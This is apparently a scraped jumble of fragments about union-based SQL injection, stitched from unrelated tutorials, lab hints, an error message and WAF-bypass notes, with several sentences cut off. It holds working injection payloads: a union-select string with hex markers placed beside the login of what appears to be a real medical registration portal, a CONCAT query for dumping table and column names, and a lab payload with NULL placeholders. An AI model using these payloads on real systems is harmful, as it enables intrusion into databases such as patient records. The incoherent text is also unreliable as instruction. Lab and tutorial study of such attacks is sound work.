... 1. - Log in to the portal registratura.med.kg ... union all select (select concat(0x41653157,(select mid((select (elt(2836=2836,1))),1,10)),0x45784179)),null -- - ...
Select cast ('365' as int); can be written less verbosely
An SQL Injection attack can successfully bypass the WAF, and be conducted in all of the following cases: • Vulnerabilities in the functions of WAF request normalization. •
concatenate tablename and columnname in the same part of the injection using the keyword CONCAT: 1 UNION SELECT 1,concat(table_name,':', column_name),3...
MySQL server version for the right syntax to use near 'UNION DISTINCT (SELECT DISTINCT a.id FROM accounts at line 1.
It's definitely another type but in this case, I call it Union-Error based, since it involves Union Select in the queries we're about to use. So let's get started.
Try replacing each null with the random value provided by the lab, for example: '+UNION+SELECT+'abcdef',NULL,NULL
Here's all you need to know about Union-based SQL Injection.
There is a function called concat() that allows me to join the two columns and display on the page. Also I will be using semicolon) in the hex form.